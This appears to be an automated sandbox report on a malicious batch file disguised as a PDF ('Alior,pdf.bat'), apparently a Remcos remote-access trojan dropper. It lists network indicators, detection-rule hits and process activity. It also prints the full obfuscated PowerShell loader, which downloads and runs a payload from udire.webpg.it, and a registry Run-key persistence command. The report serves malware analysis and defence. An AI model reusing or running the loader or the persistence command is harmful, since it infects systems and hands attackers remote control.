                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: ASSEFLOWAmsterdamInternetExchangeAMS-IXIT ASSEFLOWAmsterdamInternetExchangeAMS-IXIT
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49695 -> 148.251.230.92:80
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49697 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /Harmonikaerne.mix HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: udire.webpg.itConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /HQnhqYul185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: udire.webpg.itCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Harmonikaerne.mix HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: udire.webpg.itConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /HQnhqYul185.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: udire.webpg.itCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: udire.webpg.it
                Source: global trafficDNS traffic detected: DNS query: idonetire.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: svchost.exe, 00000007.00000002.2851635573.000001CBC26A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008ACA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpX
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpal
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpf
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gplo
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/json.gp8
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpo
                Source: powershell.exe, 00000002.00000002.1043749947.0000014D1006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1858638038.0000000005F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1840757332.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D00ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://udire.wH
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D00EDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1021395761.0000014D00DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://udire.webpg.it
                Source: msiexec.exe, 0000000E.00000002.3380138371.0000000008AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://udire.webpg.it/HQnhqYul185.bin
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D0022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://udire.webpg.it/Harmonikaerne.mixP
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://udire.webpg.it/Harmonikaerne.mixXRPm
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.1048552039.0000014D66990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 00000002.00000002.1021395761.0000014D00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBGr
                Source: powershell.exe, 00000004.00000002.1858638038.0000000005F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.1858638038.0000000005F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.1858638038.0000000005F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                Source: svchost.exe, 00000007.00000003.1216469547.000001CBC2800000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                Source: powershell.exe, 00000004.00000002.1840757332.0000000004FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1043749947.0000014D1006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1858638038.0000000005F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008ACA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6560, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Source: amsi32_6948.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6392, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6948, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C166B1862_2_00007FF9C166B186
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C166BF322_2_00007FF9C166BF32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C173B7EA2_2_00007FF9C173B7EA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C173BFFA2_2_00007FF9C173BFFA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04D56F684_2_04D56F68
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04D56F684_2_04D56F68
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3253
                Source: unknownProcess created: Commandline size = 3277
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3253Jump to behavior
                Source: amsi32_6948.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6392, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6948, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.evad.winBAT@15/16@3/4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Rdkindedes90.ParJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-LSHWWC
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ul4aa554.pbr.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Alior,pdf.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6392
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6948
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: Alior,pdf.batVirustotal: Detection: 11%
                Source: Alior,pdf.batReversingLabs: Detection: 15%
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Alior,pdf.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Bjrgningsfartjet='func';Get-History;$Bjrgningsfartjet+='t';Get-History;$Bjrgningsfartjet+='ion:';(ni -p $Bjrgningsfartjet -n Slede -value { param($Monastically);$Asherah229=1;do {$Specifikationsmetodikker+=$Monastically[$Asherah229];$Asherah229+=2} until(!$Monastically[$Asherah229])$Specifikationsmetodikker});ConvertTo-Html;(ni -p $Bjrgningsfartjet -n Studiefagets -value {param($Variabelerklringers);.($kvalt) ($Variabelerklringers)});ConvertTo-Html;$Sternocleidomastoid=Slede 'gnBE TH.NW';$Sternocleidomastoid+=Slede 'PE BPC LQiGe.N T';$bogklubbgers=Slede ' MNoszki lBlMa /';$Bottomers8=Slede 'VT,l s 1 2';$Fendillation=' [ nSe TU.SS EErtvSi c,E P O.i N.t mTaIn a.GBeBR.] : :GS EAC u r,I t Y p r OPTTO CDoClS= $ BPo TNtWO,m E.RSS 8';$bogklubbgers+=Slede ' 5C..0. S( W i n d,o wBsR NIT .1 0U..0.; UW ionC6F4V;S NxO6,4 ;K rPvF: 1T3P4.. 0A)D G eMc k.oM/,2R0A1,0 0,1 0E1 LFOi.rDe f oTx / 1,3P4u. 0';$Postventral=Slede 'SUAS E R -SaCg.E,NEt';$Spunshul=Slede 'IhStgt pa:L/D/Du dPiNrDeA. wEe,b pKg,.,i tR/ H,alr.mPognMi k a ejr nNe.. mAi x';$Putidness=Slede 'R>';$kvalt=Slede ' iUE.x';$Fluesnapperes='Opnaaende';$Undarkened='\Rdkindedes90.Par';Studiefagets (Slede ' $Dg.lSO.b,a.Ld:HD a TUa B EShUa NTDOlUeDS =k$ EAnAvN:MA PsP dDA Tea + $RuPn D AIrDKSE N ESd');Studiefagets (Slede 'S$Sg,l oABGa lB:,b o D e l S 1K0 3N=A$ sUP u.nMS.H u L,..s pBL IOt (S$ pCUGtUIVDpNKe s s,)');Studiefagets (Slede $Fendillation);$Spunshul=$Bodels103[0];$Perosmic=(Slede ' $pG.lOo bOA LB:MD i.F,tEEUR.INsA= nBEUwD-.o bRj,E cktF sTyLSNtVe mH.O$,S tFE,R,nSoSCFlnE ITd O M A s tIO I D');Studiefagets ($Perosmic);Studiefagets (Slede ' $ DBi fPtSe rIiPs .MH e aTd e rFs,[B$ ProdsAt v.eSnPt rSa lS] =A$ b o,gTkAl u.bfb gFeDrHs');$Storefronts=Slede ' $SDJi.fpt e r i s,..DsoBwAnSlToBa d FTi,lSe ( $KS p.uEnKsTh u l , $SD eDnui e rIeFn,sS)';$Denierens=$Databehandles;Studiefagets (Slede ' $MG.LJo BBaSlM:IGHrDAEfHi k.s ySsDt e m E t =O( TfE S t -APFa T HA A$,D e NFiDEPRCeSNMs )');while (!$Grafiksystemet) {Studiefagets (Slede 'B$IgPl o bRa lS:SU nSf a iSlGa bSlDy = $ SktCi nHkRe,t') ;Studiefagets $Storefronts;Studiefagets (Slede 'a[,t H r E asdSiPnNGS. T H R E a,d ] : :osAlTeSeSpV( 4T0 0P0 )');Studiefagets (Slede ' $ gvlIoEBEanL :,gDrFACfsiMK sDywS,T e,m eUTB=,( t E s TO-WPTa t HT O$ d E.NBI,EHr efNSS )') ;Studiefagets (Slede 'P$ gFlAo bAa lP:WPHE r I.p.nFE u MAOBn ISaS=U$EgOL.o b a lS:Np OHSRT NDaPt.a LRl y + + %S$ bHO dPe lDs.1b0D3 .JCUoDurNST') ;$Spunshul=$Bodels103[$Peripneumonia]}$Transcenderende=329225;$Ultrastructurally=28193;Studiefagets (Slede ' $ G.lAO bIa.l : FUE.MHEDt A gMe,rSS HDU s e sR P=C BG eITT-GCOo nKTBe n.TS B$DdDe,N ISEHrSEPNKs');Studiefagets (Slede '.$Sg.lSo bVaMl :FsStSeSgWe p aMnUd ePr n e sS = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCLSEN O=F M[ S.y SetaeAM .
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Bjrgningsfartjet='func';Get-History;$Bjrgningsfartjet+='t';Get-History;$Bjrgningsfartjet+='ion:';(ni -p $Bjrgningsfartjet -n Slede -value { param($Monastically);$Asherah229=1;do {$Specifikationsmetodikker+=$Monastically[$Asherah229];$Asherah229+=2} until(!$Monastically[$Asherah229])$Specifikationsmetodikker});ConvertTo-Html;(ni -p $Bjrgningsfartjet -n Studiefagets -value {param($Variabelerklringers);.($kvalt) ($Variabelerklringers)});ConvertTo-Html;$Sternocleidomastoid=Slede 'gnBE TH.NW';$Sternocleidomastoid+=Slede 'PE BPC LQiGe.N T';$bogklubbgers=Slede ' MNoszki lBlMa /';$Bottomers8=Slede 'VT,l s 1 2';$Fendillation=' [ nSe TU.SS EErtvSi c,E P O.i N.t mTaIn a.GBeBR.] : :GS EAC u r,I t Y p r OPTTO CDoClS= $ BPo TNtWO,m E.RSS 8';$bogklubbgers+=Slede ' 5C..0. S( W i n d,o wBsR NIT .1 0U..0.; UW ionC6F4V;S NxO6,4 ;K rPvF: 1T3P4.. 0A)D G eMc k.oM/,2R0A1,0 0,1 0E1 LFOi.rDe f oTx / 1,3P4u. 0';$Postventral=Slede 'SUAS E R -SaCg.E,NEt';$Spunshul=Slede 'IhStgt pa:L/D/Du dPiNrDeA. wEe,b pKg,.,i tR/ H,alr.mPognMi k a ejr nNe.. mAi x';$Putidness=Slede 'R>';$kvalt=Slede ' iUE.x';$Fluesnapperes='Opnaaende';$Undarkened='\Rdkindedes90.Par';Studiefagets (Slede ' $Dg.lSO.b,a.Ld:HD a TUa B EShUa NTDOlUeDS =k$ EAnAvN:MA PsP dDA Tea + $RuPn D AIrDKSE N ESd');Studiefagets (Slede 'S$Sg,l oABGa lB:,b o D e l S 1K0 3N=A$ sUP u.nMS.H u L,..s pBL IOt (S$ pCUGtUIVDpNKe s s,)');Studiefagets (Slede $Fendillation);$Spunshul=$Bodels103[0];$Perosmic=(Slede ' $pG.lOo bOA LB:MD i.F,tEEUR.INsA= nBEUwD-.o bRj,E cktF sTyLSNtVe mH.O$,S tFE,R,nSoSCFlnE ITd O M A s tIO I D');Studiefagets ($Perosmic);Studiefagets (Slede ' $ DBi fPtSe rIiPs .MH e aTd e rFs,[B$ ProdsAt v.eSnPt rSa lS] =A$ b o,gTkAl u.bfb gFeDrHs');$Storefronts=Slede ' $SDJi.fpt e r i s,..DsoBwAnSlToBa d FTi,lSe ( $KS p.uEnKsTh u l , $SD eDnui e rIeFn,sS)';$Denierens=$Databehandles;Studiefagets (Slede ' $MG.LJo BBaSlM:IGHrDAEfHi k.s ySsDt e m E t =O( TfE S t -APFa T HA A$,D e NFiDEPRCeSNMs )');while (!$Grafiksystemet) {Studiefagets (Slede 'B$IgPl o bRa lS:SU nSf a iSlGa bSlDy = $ SktCi nHkRe,t') ;Studiefagets $Storefronts;Studiefagets (Slede 'a[,t H r E asdSiPnNGS. T H R E a,d ] : :osAlTeSeSpV( 4T0 0P0 )');Studiefagets (Slede ' $ gvlIoEBEanL :,gDrFACfsiMK sDywS,T e,m eUTB=,( t E s TO-WPTa t HT O$ d E.NBI,EHr efNSS )') ;Studiefagets (Slede 'P$ gFlAo bAa lP:WPHE r I.p.nFE u MAOBn ISaS=U$EgOL.o b a lS:Np OHSRT NDaPt.a LRl y + + %S$ bHO dPe lDs.1b0D3 .JCUoDurNST') ;$Spunshul=$Bodels103[$Peripneumonia]}$Transcenderende=329225;$Ultrastructurally=28193;Studiefagets (Slede ' $ G.lAO bIa.l : FUE.MHEDt A gMe,rSS HDU s e sR P=C BG eITT-GCOo nKTBe n.TS B$DdDe,N ISEHrSEPNKs');Studiefagets (Slede '.$Sg.lSo bVaMl :FsStSeSgWe p aMnUd ePr n e sS = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCL
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Bjrgningsfartjet='func';Get-History;$Bjrgningsfartjet+='t';Get-History;$Bjrgningsfartjet+='ion:';(ni -p $Bjrgningsfartjet -n Slede -value { param($Monastically);$Asherah229=1;do {$Specifikationsmetodikker+=$Monastically[$Asherah229];$Asherah229+=2} until(!$Monastically[$Asherah229])$Specifikationsmetodikker});ConvertTo-Html;(ni -p $Bjrgningsfartjet -n Studiefagets -value {param($Variabelerklringers);.($kvalt) ($Variabelerklringers)});ConvertTo-Html;$Sternocleidomastoid=Slede 'gnBE TH.NW';$Sternocleidomastoid+=Slede 'PE BPC LQiGe.N T';$bogklubbgers=Slede ' MNoszki lBlMa /';$Bottomers8=Slede 'VT,l s 1 2';$Fendillation=' [ nSe TU.SS EErtvSi c,E P O.i N.t mTaIn a.GBeBR.] : :GS EAC u r,I t Y p r OPTTO CDoClS= $ BPo TNtWO,m E.RSS 8';$bogklubbgers+=Slede ' 5C..0. S( W i n d,o wBsR NIT .1 0U..0.; UW ionC6F4V;S NxO6,4 ;K rPvF: 1T3P4.. 0A)D G eMc k.oM/,2R0A1,0 0,1 0E1 LFOi.rDe f oTx / 1,3P4u. 0';$Postventral=Slede 'SUAS E R -SaCg.E,NEt';$Spunshul=Slede 'IhStgt pa:L/D/Du dPiNrDeA. wEe,b pKg,.,i tR/ H,alr.mPognMi k a ejr nNe.. mAi x';$Putidness=Slede 'R>';$kvalt=Slede ' iUE.x';$Fluesnapperes='Opnaaende';$Undarkened='\Rdkindedes90.Par';Studiefagets (Slede ' $Dg.lSO.b,a.Ld:HD a TUa B EShUa NTDOlUeDS =k$ EAnAvN:MA PsP dDA Tea + $RuPn D AIrDKSE N ESd');Studiefagets (Slede 'S$Sg,l oABGa lB:,b o D e l S 1K0 3N=A$ sUP u.nMS.H u L,..s pBL IOt (S$ pCUGtUIVDpNKe s s,)');Studiefagets (Slede $Fendillation);$Spunshul=$Bodels103[0];$Perosmic=(Slede ' $pG.lOo bOA LB:MD i.F,tEEUR.INsA= nBEUwD-.o bRj,E cktF sTyLSNtVe mH.O$,S tFE,R,nSoSCFlnE ITd O M A s tIO I D');Studiefagets ($Perosmic);Studiefagets (Slede ' $ DBi fPtSe rIiPs .MH e aTd e rFs,[B$ ProdsAt v.eSnPt rSa lS] =A$ b o,gTkAl u.bfb gFeDrHs');$Storefronts=Slede ' $SDJi.fpt e r i s,..DsoBwAnSlToBa d FTi,lSe ( $KS p.uEnKsTh u l , $SD eDnui e rIeFn,sS)';$Denierens=$Databehandles;Studiefagets (Slede ' $MG.LJo BBaSlM:IGHrDAEfHi k.s ySsDt e m E t =O( TfE S t -APFa T HA A$,D e NFiDEPRCeSNMs )');while (!$Grafiksystemet) {Studiefagets (Slede 'B$IgPl o bRa lS:SU nSf a iSlGa bSlDy = $ SktCi nHkRe,t') ;Studiefagets $Storefronts;Studiefagets (Slede 'a[,t H r E asdSiPnNGS. T H R E a,d ] : :osAlTeSeSpV( 4T0 0P0 )');Studiefagets (Slede ' $ gvlIoEBEanL :,gDrFACfsiMK sDywS,T e,m eUTB=,( t E s TO-WPTa t HT O$ d E.NBI,EHr efNSS )') ;Studiefagets (Slede 'P$ gFlAo bAa lP:WPHE r I.p.nFE u MAOBn ISaS=U$EgOL.o b a lS:Np OHSRT NDaPt.a LRl y + + %S$ bHO dPe lDs.1b0D3 .JCUoDurNST') ;$Spunshul=$Bodels103[$Peripneumonia]}$Transcenderende=329225;$Ultrastructurally=28193;Studiefagets (Slede ' $ G.lAO bIa.l : FUE.MHEDt A gMe,rSS HDU s e sR P=C BG eITT-GCOo nKTBe n.TS B$DdDe,N ISEHrSEPNKs');Studiefagets (Slede '.$Sg.lSo bVaMl :FsStSeSgWe p aMnUd ePr n e sS = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCLSEN O=F M[ S.y SetaeAM .Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
